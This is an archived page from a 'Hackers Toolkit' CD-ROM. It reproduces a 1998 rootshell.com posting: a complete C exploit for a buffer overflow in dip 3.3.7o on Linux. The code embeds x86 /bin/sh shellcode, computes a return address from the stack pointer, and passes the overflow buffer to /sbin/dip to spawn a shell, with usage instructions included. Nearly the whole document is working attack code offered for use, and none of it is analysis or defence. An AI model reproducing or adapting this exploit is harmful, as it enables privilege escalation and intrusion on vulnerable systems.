home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Toolkit v2.0
/
Hackers_Toolkit_v2.0.iso
/
HTML
/
archive
/
Unix
/
c-src
/
dip3_3_7o-exp.c
< prev
next >
Wrap
C/C++ Source or Header
|
1999-11-04
|
1KB
|
73 lines
[ http://www.rootshell.com/ ]
From jamez@uground.org Thu May 7 16:25:54 1998
Date: Thu, 07 May 1998 20:13:55 +0000
From: jamez <jamez@uground.org>
To: www-request@rootshell.com
Subject: dip 3.3.7o exploit
hi there, there's an exploit for dip 3.3.7 buffer overflow. Tested on
Slackware 3.4.
(7 May 1998)
---- cut here ----
/*
dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998)
coded by jamez. e-mail: jamez@uground.org
thanks to all ppl from uground.
usage:
gcc -o dip-exp dip3.3.7o-exp.c
./dip-exp offset (-100 to 100. probably 0. tested on slack 3.4)
*/
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define SIZE 130
/* cause it's a little buffer, i wont use NOP's */
char buffer[SIZE];
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char * argv[])
{
int i = 0,
offset = 0;
long addr;
if(argc > 1) offset = atoi(argv[1]);
addr = get_esp() - offset - 0xcb;
for(i = 0; i < strlen(shellcode); i++)
buffer[i] = shellcode[i];
for (; i < SIZE; i += 4)
{
buffer[i ] = addr & 0x000000ff;
buffer[i+1] = (addr & 0x0000ff00) >> 8;
buffer[i+2] = (addr & 0x00ff0000) >> 16;
buffer[i+3] = (addr & 0xff000000) >> 24;
}
buffer[SIZE - 1] = 0;
execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)0);
}
